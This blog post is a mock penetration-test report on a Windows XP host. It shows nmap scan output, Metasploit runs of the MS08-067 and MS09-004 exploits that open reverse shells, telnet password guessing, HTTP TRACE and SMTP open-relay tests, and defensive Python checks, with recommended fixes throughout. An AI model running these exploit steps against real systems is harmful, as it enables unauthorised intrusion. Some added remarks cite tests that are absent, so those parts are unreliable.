mock – pentest one

https://myexploit.wordpress.com/myexploit2600_security_conference_talks/

I made the below about 8 years ago; please don’t consider it to be of real use today ;0)

Title: Pentest Results
Date of Testing: 1433-02-01
Assigned To: Client A
Number of Critical issues: 2
Number of High issues: 4
Name of Tester: MyExploitHQ

——————————————————

Nmap Results:

root@bt:~# nmap -sS -sC -sV --open Client-IP-Address

Starting Nmap 5.61TEST4 ( http://nmap.org ) at 1433-02-01 12:19 BST
Nmap scan report for Client-IP-Address
Host is up (0.00033s latency).
Not shown: 990 closed ports
PORT     STATE SERVICE      VERSION

21/tcp   open  ftp          Microsoft ftpd
|_ftp-anon: Anonymous FTP login allowed (FTP code 230)

23/tcp   open  telnet       Microsoft Windows XP telnetd

25/tcp   open  smtp         Microsoft ESMTP 6.0.2600.5512
| smtp-commands: PC.name.com Hello [Tester-IP-Address], SIZE 2097152, PIPELINING, DSN, ENHANCEDSTATUSCODES, 8bitmime, BINARYMIME, CHUNKING, VRFY, OK,
|_ This server supports the following commands: HELO EHLO STARTTLS RCPT DATA RSET MAIL QUIT HELP AUTH BDAT VRFY

80/tcp   open  http         Microsoft IIS httpd 5.1
|_http-title: Directory Listing Denied
| http-methods: Potentially risky methods: TRACE COPY PROPFIND SEARCH LOCK UNLOCK DELETE PUT MOVE MKCOL PROPPATCH
|_See http://nmap.org/nsedoc/scripts/http-methods.html

135/tcp  open  msrpc        Microsoft Windows RPC
139/tcp  open  netbios-ssn
443/tcp  open  https?
445/tcp  open  microsoft-ds Microsoft Windows XP microsoft-ds

1027/tcp open  msrpc        Microsoft Windows RPC
1433/tcp open  ms-sql-s     Microsoft SQL Server 2005 9.00.1399.00; RTM

MAC Address: 01:02:03:0a:0b:0c (Mickey Systems)
Service Info: Host: PC.name.com; OSs: Windows, Windows XP; CPE: cpe:/o:microsoft:windows, cpe:/o:microsoft:windows_xp

Host script results:
|_nbstat: NetBIOS name: PC, NetBIOS user: , NetBIOS MAC: 01:02:03:0a:0b:0c (Mickey Systems)
|_smbv2-enabled: Server doesn't support SMBv2 protocol
| smb-security-mode:
|   Account that was used for smb scripts: guest
|   User-level authentication
|   SMB Security: Challenge/response passwords supported
|_  Message signing disabled (dangerous, but default)
| smb-os-discovery:
|   OS: Windows XP (Windows 2000 LAN Manager)
|   Computer name: PC
|   Domain name: name.com
|   Forest name: name.com
|   FQDN: PC.name.com
|   NetBIOS computer name: PC
|   NetBIOS domain name: name
|_  System time: 1433-02-01 12:19:39 UTC+1
| ms-sql-info:
|   Windows server name: PC
|   [Client-IP-Address\SQLEXPRESS]
|     Instance name: SQLEXPRESS
|     Version: Microsoft SQL Server 2005 RTM
|       Version number: 9.00.1399.00
|       Product: Microsoft SQL Server 2005
|       Service pack level: RTM
|       Post-SP patches applied: No
|     TCP port: 1433
|_    Clustered: No

Service detection performed. Please report any incorrect results at http://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 9.11 seconds
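The scan above is read by eye in the sections that follow. As an added example (my own, not part of the original report or the blog's tooling), here is a small Python script that parses nmap's normal output into per-port records and applies the same review rules, turning the NSE script lines into a findings list with a severity per item. The rule wording and severities are my assumptions; the sample input is the scan output from this page, trimmed to the lines the rules look at.

```python
import re
from typing import Dict, List

# Constructed sample: the nmap normal-format output from the scan above,
# trimmed to the port and NSE script lines the rules below look at.
SAMPLE_SCAN = """\
PORT     STATE SERVICE      VERSION
21/tcp   open  ftp          Microsoft ftpd
|_ftp-anon: Anonymous FTP login allowed (FTP code 230)
23/tcp   open  telnet       Microsoft Windows XP telnetd
25/tcp   open  smtp         Microsoft ESMTP 6.0.2600.5512
80/tcp   open  http         Microsoft IIS httpd 5.1
|_http-title: Directory Listing Denied
| http-methods: Potentially risky methods: TRACE COPY PROPFIND SEARCH LOCK UNLOCK DELETE PUT MOVE MKCOL PROPPATCH
|_See http://nmap.org/nsedoc/scripts/http-methods.html
445/tcp  open  microsoft-ds Microsoft Windows XP microsoft-ds
1433/tcp open  ms-sql-s     Microsoft SQL Server 2005 9.00.1399.00; RTM
Host script results:
|_smbv2-enabled: Server doesn't support SMBv2 protocol
| smb-security-mode:
|_  Message signing disabled (dangerous, but default)
| ms-sql-info:
|       Service pack level: RTM
|_      Post-SP patches applied: No
"""

# "<port>/<proto>  <state>  <service>  <version...>"
PORT_RE = re.compile(r"^(\d+)/(tcp|udp)\s+(\w+)\s+(\S+)\s*(.*)$")


def parse_scan(text: str) -> List[Dict]:
    """Group nmap normal output into one record per port, each carrying the
    NSE script lines printed under it. Host-level script results (printed
    after "Host script results:") are collected under port 0."""
    host = {"port": 0, "state": "host", "service": "host", "version": "", "scripts": []}
    records, current = [], host
    for line in text.splitlines():
        m = PORT_RE.match(line)
        if m:
            current = {"port": int(m.group(1)), "state": m.group(3),
                       "service": m.group(4), "version": m.group(5).strip(),
                       "scripts": []}
            records.append(current)
        elif line.startswith("Host script results"):
            current = host
        elif line.startswith("|"):
            # drop the NSE tree prefix ("| ", "|_", "|   ") and keep the text
            current["scripts"].append(line.lstrip("|_ ").rstrip())
    records.append(host)
    return records


def triage(records: List[Dict]) -> List[Dict]:
    """Apply simple review rules to the parsed scan and return findings as
    {"port", "severity", "title"} dicts. The rules encode the checks a
    reviewer makes by eye when reading the scan above (severities are my own)."""
    findings: List[Dict] = []

    def add(rec: Dict, severity: str, title: str) -> None:
        findings.append({"port": rec["port"], "severity": severity, "title": title})

    for rec in records:
        if rec["state"] not in ("open", "host"):
            continue
        joined = " ".join(rec["scripts"])
        if rec["service"] == "ftp" and "Anonymous FTP login allowed" in joined:
            add(rec, "High", "Anonymous FTP login permitted")
        if rec["service"] == "telnet":
            add(rec, "High", "Telnet exposes clear-text remote logins")
        if rec["service"] == "smtp":
            add(rec, "Info", "SMTP listener present: verify relay restrictions manually")
        for script in rec["scripts"]:
            if script.startswith("http-methods: Potentially risky methods:"):
                risky = script.split(":", 2)[2].split()
                # TRACE enables cross-site tracing; the WebDAV verbs allow content changes
                severity = "High" if "TRACE" in risky else "Medium"
                add(rec, severity, "Risky HTTP methods enabled: " + " ".join(risky))
        if "Message signing disabled" in joined:
            add(rec, "Medium", "SMB message signing disabled")
        if "doesn't support SMBv2" in joined:
            add(rec, "Medium", "Only SMBv1 is offered")
        if "Post-SP patches applied: No" in joined:
            add(rec, "High", "SQL Server running at RTM with no post-release patches")
    return findings


def severity_counts(findings: List[Dict]) -> Dict[str, int]:
    """Totals per severity, the numbers a report summary like the one at the
    top of this page is built from."""
    counts: Dict[str, int] = {}
    for f in findings:
        counts[f["severity"]] = counts.get(f["severity"], 0) + 1
    return counts


if __name__ == "__main__":
    found = triage(parse_scan(SAMPLE_SCAN))
    for f in sorted(found, key=lambda f: f["port"]):
        print(f"{f['port']:>5}  {f['severity']:<6}  {f['title']}")
    print(severity_counts(found))
```

Host-level NSE results (SMB security mode, ms-sql-info) are kept under port 0 so they are not lost when nmap prints them after the port table; a real report would still confirm each automated finding by hand, as the sections below do.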

------------------------------------------------------

Manual testing:

------------------------------------------------------

Microsoft Security Bulletin MS08-067 - Critical
Vulnerability in Server Service Could Allow Remote Code Execution (958644)

1. Windows XP + 445/tcp  open  microsoft-ds Microsoft Windows XP microsoft-ds = metasploit-ms08_067_netapi

msf > use windows/smb/ms08_067_netapi

msf  exploit(ms08_067_netapi) > set lhost  Tester-IP-Address

msf  exploit(ms08_067_netapi) > set rhost Client-IP-Address

msf  exploit(ms08_067_netapi) > exploit

[*] Started reverse handler on Tester-IP-Address:4444
[*] Automatically detecting the target...
[*] Fingerprint: Windows XP - Service Pack 3 - lang:English
[*] Selected Target: Windows XP SP3 English (AlwaysOn NX)
[*] Attempting to trigger the vulnerability...
[*] Sending stage (752128 bytes) to Client-IP-Address
[*] Meterpreter session 1 opened (Tester-IP-Address:4444 -> Client-IP-Address:1046) at 1433-02-01 12:23:29 +0100

meterpreter > shell
Process 3728 created.
Channel 1 created.
Microsoft Windows XP [Version 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.

C:\WINDOWS\system32>

Priority: Critical

Recommendation: Apply the MS08-067 update immediately and review and install all other security updates as recommended by vendor.

------------------------------------------------------

Microsoft Security Bulletin MS09-004 - Important
Vulnerability in Microsoft SQL Server Could Allow Remote Code Execution (959420)

2. 1433/tcp open  ms-sql-s Microsoft SQL Server 2005 9.00.1399.00; RTM = metasploit-mssql-ms09_004_sp_replwritetovarbin

msf  exploit(ms09_004_sp_replwritetovarbin) > use exploit/windows/mssql/ms09_004_sp_replwritetovarbin

msf  exploit(ms09_004_sp_replwritetovarbin) > set lhost  Tester-IP-Address

msf  exploit(ms09_004_sp_replwritetovarbin) > set rhost Client-IP-Address

msf  exploit(ms09_004_sp_replwritetovarbin) > exploit

[*] Started reverse handler on Tester-IP-Address:4444
[*] Attempting automatic target detection...
[*] Automatically detected target "MSSQL 2005 SP0 (9.00.1399.06)"
[*] Redirecting flow to 0x10e860f via call to our faked vtable ptr @ 0x2201ca8
[*] Sending stage (752128 bytes) to Client-IP-Address
[*] Meterpreter session 2 opened (Tester-IP-Address:4444 -> Client-IP-Address:1053) at 1433-02-01 12:26:12 +0100

meterpreter > shell
Process 2324 created.
Channel 1 created.
Microsoft Windows XP [Version 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.

C:\WINDOWS\system32>

Priority: Critical

Recommendation: Apply the MS09-004 update immediately and review and install all other security updates as recommended by vendor.

------------------------------------------------------

3. Testing for HTTP Methods and XST (OWASP-CM-008)

Nmap discovered 80/tcp   open  http         Microsoft IIS httpd 5.1
|_http-title: Directory Listing Denied
| http-methods: Potentially risky methods: TRACE COPY PROPFIND SEARCH LOCK UNLOCK DELETE PUT MOVE MKCOL PROPPA

root@bt:~# telnet Client-IP-Address 80
Trying Client-IP-Address...
Connected to Client-IP-Address.
Escape character is '^]'.
OPTIONS / HTTP/1.1
Host: Client-IP-Address

HTTP/1.1 200 OK
Server: Microsoft-IIS/5.1
Date: Thu, 01 Jan 1433 11:36:38 GMT
MS-Author-Via: DAV
Content-Length: 0
Accept-Ranges: none
DASL:
DAV: 1, 2
Public: OPTIONS, TRACE, GET, HEAD, DELETE, PUT, POST, COPY, MOVE, MKCOL, PROPFIND, PROPPATCH, LOCK, UNLOCK, SEARCH
Allow: OPTIONS, TRACE, GET, HEAD, COPY, PROPFIND, SEARCH, LOCK, UNLOCK
Cache-Control: private

Testing TRACE proves positive, as seen below: the response mirrors the request, including the Host: Client-IP-Address header, back to the client.

root@bt:~# telnet Client-IP-Address 80
Trying Client-IP-Address...
Connected to Client-IP-Address.
Escape character is '^]'.
TRACE / HTTP/1.1
Host: Client-IP-Address

HTTP/1.1 200 OK
Server: Microsoft-IIS/5.1
Date: Thu, 01 Jan 1433 11:38:37 GMT
Content-Type: message/http
Content-Length: 42

TRACE / HTTP/1.1
Host: Client-IP-Address

Priority: High

Recommendation: Install the Microsoft UrlScan Security Tool. The urlscan.ini file included with UrlScan sets "UseAllowVerbs=1" by default, and its [AllowVerbs] section lists only the HTTP methods GET, HEAD and POST, so simply by installing UrlScan you are protected from TRACE and TRACK.
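The two telnet exchanges above are the manual version of this test. As an added Python example (mine, not the report's), the code below parses an OPTIONS reply to list the verbs the server advertises, checks a TRACE reply for reflected request headers (the cross-site tracing condition), and shows which advertised verbs an allow-list filter like UrlScan's default [AllowVerbs] would reject. The sample messages are re-typed from the captures above with CRLF line endings; the Cookie header and the Content-Length values are constructed for the example.

```python
from typing import Dict, List, Set, Tuple

# Constructed samples: the two IIS 5.1 exchanges captured above, re-typed with
# CRLF line endings as they travel on the wire. Content-Length is computed from
# the constructed body rather than copied from the capture.
OPTIONS_RESPONSE = (
    "HTTP/1.1 200 OK\r\n"
    "Server: Microsoft-IIS/5.1\r\n"
    "MS-Author-Via: DAV\r\n"
    "Content-Length: 0\r\n"
    "DAV: 1, 2\r\n"
    "Public: OPTIONS, TRACE, GET, HEAD, DELETE, PUT, POST, COPY, MOVE, MKCOL, "
    "PROPFIND, PROPPATCH, LOCK, UNLOCK, SEARCH\r\n"
    "Allow: OPTIONS, TRACE, GET, HEAD, COPY, PROPFIND, SEARCH, LOCK, UNLOCK\r\n"
    "\r\n"
)
TRACE_REQUEST = (
    "TRACE / HTTP/1.1\r\n"
    "Host: Client-IP-Address\r\n"
    "Cookie: session=constructed-sample-value\r\n"   # the header XST is after
    "\r\n"
)
TRACE_RESPONSE = (
    "HTTP/1.1 200 OK\r\n"
    "Server: Microsoft-IIS/5.1\r\n"
    "Content-Type: message/http\r\n"
    f"Content-Length: {len(TRACE_REQUEST)}\r\n"
    "\r\n" + TRACE_REQUEST
)

# Verbs that reflect the request (TRACE/TRACK) or let a client change content
# (the WebDAV verbs nmap's http-methods script lists as risky).
RISKY_VERBS = {"TRACE", "TRACK", "PUT", "DELETE", "COPY", "MOVE", "MKCOL",
               "PROPFIND", "PROPPATCH", "LOCK", "UNLOCK", "SEARCH"}

# The verbs UrlScan's default [AllowVerbs] section permits with UseAllowVerbs=1
URLSCAN_DEFAULT_ALLOW = {"GET", "HEAD", "POST"}


def parse_http(raw: str) -> Tuple[str, Dict[str, str], str]:
    """Split a raw HTTP message into (start line, lower-cased header map, body)."""
    head, _, body = raw.partition("\r\n\r\n")
    lines = head.split("\r\n")
    headers: Dict[str, str] = {}
    for line in lines[1:]:
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    return lines[0], headers, body


def advertised_verbs(options_response: str) -> Set[str]:
    """Union of the verbs an OPTIONS reply lists in its Allow and Public headers."""
    _, headers, _ = parse_http(options_response)
    verbs: Set[str] = set()
    for name in ("allow", "public"):
        verbs.update(v.strip().upper() for v in headers.get(name, "").split(",") if v.strip())
    return verbs


def risky_verbs(options_response: str) -> List[str]:
    """Advertised verbs that warrant a finding, sorted for stable reporting."""
    return sorted(advertised_verbs(options_response) & RISKY_VERBS)


def trace_reflected(request: str, response: str) -> List[str]:
    """Names of request headers echoed verbatim in a TRACE reply. A non-empty
    list confirms cross-site tracing: anything able to issue TRACE can read
    those headers (e.g. Cookie) back out of the response body."""
    status, headers, body = parse_http(response)
    if not status.startswith("HTTP/1.1 200") or headers.get("content-type") != "message/http":
        return []
    _, req_headers, _ = parse_http(request)
    return [name for name, value in req_headers.items()
            if f"{name}: {value}".lower() in body.lower()]


def blocked_by_allow_list(options_response: str, allowed: Set[str] = URLSCAN_DEFAULT_ALLOW) -> List[str]:
    """Advertised verbs an allow-list filter would reject, i.e. what installing
    UrlScan with its default ini removes from exposure."""
    return sorted(advertised_verbs(options_response) - allowed)


if __name__ == "__main__":
    print("risky verbs advertised:", risky_verbs(OPTIONS_RESPONSE))
    print("headers reflected by TRACE:", trace_reflected(TRACE_REQUEST, TRACE_RESPONSE))
    print("blocked by UrlScan default allow list:", blocked_by_allow_list(OPTIONS_RESPONSE))
```

After the fix, re-running the same two checks should give an empty reflected-header list (TRACE refused) and no risky verbs in the OPTIONS reply; the last two assertions in the test model that hardened response.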

------------------------------------------------------

4. Testing Anonymous FTP

Nmap discovered 21/tcp   open  ftp          Microsoft ftpd
|_ftp-anon: Anonymous FTP login allowed (FTP code 230)

Browsing ftp://Client-IP-Address/ in Firefox is not met with any restrictions.

------------------------------------------------------

5. Using Metasploit to test FTP

msf > use  auxiliary/scanner/ftp/anonymous

msf  auxiliary(anonymous) > set rhosts Client-IP-Address

msf  auxiliary(anonymous) > run

[*] Client-IP-Address:21 Anonymous READ (220 Microsoft FTP Service)
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed

Priority: High

Recommendation: If FTP file-share access is not required, disable the service. If it is required, restrict access to the service by source IP address.

------------------------------------------------------

6. Testing telnet access

Nmap discovered 23/tcp   open  telnet       Microsoft Windows XP telnetd

root@bt:~# telnet Client-IP-Address
Trying Client-IP-Address...
Connected to Client-IP-Address.
Escape character is '^]'.
Welcome to Microsoft Telnet Service

login: administrator
password: password
Logon failure: unknown user name or bad password.

Login Failed

login: administrator
password: Password
Logon failure: unknown user name or bad password.

Login Failed

login: administrator
password: p@ssw0rd

*===============================================================
Welcome to Microsoft Telnet Server.
*===============================================================
C:\Documents and Settings\>C:\Documents and Settings\>

Priority: High

Recommendation: Enforce a strong password policy. If remote command-line access is required, use SSH instead of telnet, as its traffic is encrypted.
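To make the "strong password policy" recommendation concrete, here is an added Python example (mine, not the report's) showing why a complexity rule alone would not have caught the third guess: p@ssw0rd satisfies a Windows-style three-of-four character-class rule, and only a banned-word check that undoes common substitutions rejects it. The banned-word list and substitution map are constructed for the example; a real deployment would use a breach-derived list.

```python
import re
from typing import List

# Constructed sample: the three values tried in the telnet session above.
GUESSES = ["password", "Password", "p@ssw0rd"]

# Constructed banned-word list; a real deployment uses a breach-derived list.
BANNED_WORDS = {"password", "admin", "administrator", "welcome", "letmein", "qwerty"}

# Common character substitutions undone before comparing against BANNED_WORDS
LEET_MAP = str.maketrans({"@": "a", "4": "a", "3": "e", "1": "i", "!": "i",
                          "0": "o", "$": "s", "5": "s", "7": "t"})


def meets_complexity(pw: str, min_length: int = 8) -> bool:
    """Windows-style complexity rule: a minimum length plus at least three of
    the four character classes (upper, lower, digit, symbol)."""
    classes = [re.search(r"[A-Z]", pw), re.search(r"[a-z]", pw),
               re.search(r"\d", pw), re.search(r"[^A-Za-z0-9]", pw)]
    return len(pw) >= min_length and sum(1 for c in classes if c) >= 3


def normalise(pw: str) -> str:
    """Lower-case, strip trailing digits/symbols, then undo leet substitutions,
    so 'P@ssw0rd1!' compares as 'password'."""
    base = re.sub(r"[^a-z]+$", "", pw.lower())
    return base.translate(LEET_MAP)


def is_banned(pw: str) -> bool:
    """True when the normalised form is a banned base word."""
    return normalise(pw) in BANNED_WORDS


def policy_violations(pw: str) -> List[str]:
    """Every reason a candidate password fails the combined policy; an empty
    list means it is acceptable under both checks."""
    reasons = []
    if not meets_complexity(pw):
        reasons.append("fails complexity")
    if is_banned(pw):
        reasons.append("matches banned word after normalisation")
    return reasons


if __name__ == "__main__":
    for guess in GUESSES:
        print(f"{guess!r}: complexity={meets_complexity(guess)} "
              f"violations={policy_violations(guess)}")
```

Run against the three guesses, the first two fail both checks, while p@ssw0rd passes complexity and is stopped only by the normalised banned-word check, which is the point of layering the two.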

------------------------------------------------------

7. Testing smtp access

Nmap discovered 25/tcp   open  smtp         Microsoft ESMTP 6.0.2600.5512
| smtp-commands: PC.name.com Hello [Tester-IP-Address], SIZE 2097152, PIPELINING, DSN, ENHANCEDSTATUSCODES, 8bitmime, BINARYMIME, CHUNKING, VRFY, OK,
|_ This server supports the following commands: HELO EHLO STARTTLS RCPT DATA RSET MAIL QUIT HELP AUTH BDAT VRFY

root@bt:~# telnet Client-IP-Address 25
Trying Client-IP-Address...
Connected to Client-IP-Address.
Escape character is '^]'.
220 PC.name.com Microsoft ESMTP MAIL Service, Version: 6.0.2600.5512 ready at  Thu, 01 Jan 1433 13:27:19 +0100

helo

250 PC.name.com Hello [Tester-IP-Address]

mail from:test@mail-test.com

50 2.1.0 test@mail-test.com....Sender OK

rcpt to:test@frogme.com

250 2.1.5 test@frogme.com

data

354 Start mail input; end with .

subject: TEST

test
.

250 2.6.0 Queued mail for delivery

quit

221 2.0.0 PC.name.com Service closing transmission channel

Connection closed by foreign host.

Priority: High

Recommendation: Relay is enabled and needs to be restricted:

Administrative Tools / Internet Information Services / local computer / Default SMTP Virtual Server – right click Properties / Access tab / Relay… (Options here)

If you then see "550 5.7.1 Unable to relay for test@frogme.com", relay is set to "Only the list below". This blocks the server from being used to send spam.
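As an added Python example (mine, not the report's), the code below does two things with the relay test above: it reads a client/server transcript and reports any recipient outside the local domains that the server accepted, and it models the SMTP virtual server's Relay setting so the 250 and 550 5.7.1 replies from the recommendation can be seen side by side. The transcript is re-typed from the session above with "C:"/"S:" side markers, and the sender-OK line is written as 250; the local domain name.com and the relay address 10.0.0.5 are constructed for the example.

```python
from typing import Iterable, List, Set, Tuple

# Constructed sample: the relay test captured above, one line per exchange,
# with "C:" for what the tester typed and "S:" for the server's replies.
OPEN_RELAY_TRANSCRIPT = """\
S: 220 PC.name.com Microsoft ESMTP MAIL Service, Version: 6.0.2600.5512 ready
C: helo
S: 250 PC.name.com Hello [Tester-IP-Address]
C: mail from:test@mail-test.com
S: 250 2.1.0 test@mail-test.com....Sender OK
C: rcpt to:test@frogme.com
S: 250 2.1.5 test@frogme.com
C: data
S: 354 Start mail input; end with .
C: subject: TEST
C: test
C: .
S: 250 2.6.0 Queued mail for delivery
C: quit
S: 221 2.0.0 PC.name.com Service closing transmission channel
"""


def rcpt_outcomes(transcript: str) -> List[Tuple[str, str]]:
    """Pair every RCPT TO the client sent with the server's reply code."""
    outcomes, pending = [], None
    for line in transcript.splitlines():
        side, _, text = line.partition(": ")
        if side == "C" and text.lower().startswith("rcpt to:"):
            pending = text.split(":", 1)[1].strip().strip("<>")
        elif side == "S" and pending is not None:
            outcomes.append((pending, text.split()[0]))
            pending = None
    return outcomes


def relays_for_outsiders(transcript: str, local_domains: Set[str]) -> List[str]:
    """Recipients outside local_domains that the server accepted (2xx code).
    A non-empty list is the open-relay finding from the report."""
    accepted = []
    for rcpt, code in rcpt_outcomes(transcript):
        domain = rcpt.rsplit("@", 1)[-1].lower()
        if domain not in local_domains and code.startswith("2"):
            accepted.append(rcpt)
    return accepted


class RelayPolicy:
    """Model of the SMTP virtual server's Relay setting: recipients in local
    domains are accepted from anyone; recipients elsewhere are accepted only
    from the 'Only the list below' addresses (an empty list means nobody)."""

    def __init__(self, local_domains: Iterable[str], relay_from: Iterable[str] = ()):
        self.local_domains = {d.lower() for d in local_domains}
        self.relay_from = set(relay_from)

    def rcpt_reply(self, client_ip: str, recipient: str) -> str:
        domain = recipient.rsplit("@", 1)[-1].lower()
        if domain in self.local_domains or client_ip in self.relay_from:
            return f"250 2.1.5 {recipient}"
        # the reply the recommendation says to expect once relay is restricted
        return f"550 5.7.1 Unable to relay for {recipient}"


def relay_test(policy: RelayPolicy, client_ip: str, recipient: str) -> str:
    """The RCPT step of the manual test above, run against a policy, in the
    same transcript format rcpt_outcomes() reads."""
    return f"C: rcpt to:{recipient}\nS: {policy.rcpt_reply(client_ip, recipient)}"


if __name__ == "__main__":
    print("open relay accepted:", relays_for_outsiders(OPEN_RELAY_TRANSCRIPT, {"name.com"}))
    restricted = RelayPolicy(["name.com"])
    print(relay_test(restricted, "Tester-IP-Address", "test@frogme.com"))
    print(relay_test(restricted, "Tester-IP-Address", "user@name.com"))
```

Re-running the manual test after the change should produce the 550 5.7.1 line for test@frogme.com while mail for name.com recipients is still accepted; the last assertions in the test model exactly that before/after difference.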

——————————————————

For more information:

https://myexploit.wordpress.com/information-gathering-nmap/

http://www.myexploit.wordpress.com/control-metasploit-ms08_067_netapi/

http://www.myexploit.wordpress.com/control-metasploit-auxiliary_scanner_http/

http://www.myexploit.wordpress.com/control-metasploit-ftp_login/

http://www.myexploit.wordpress.com/control-metasploit-mssql-ms09_004_sp_replwritetovarbin/
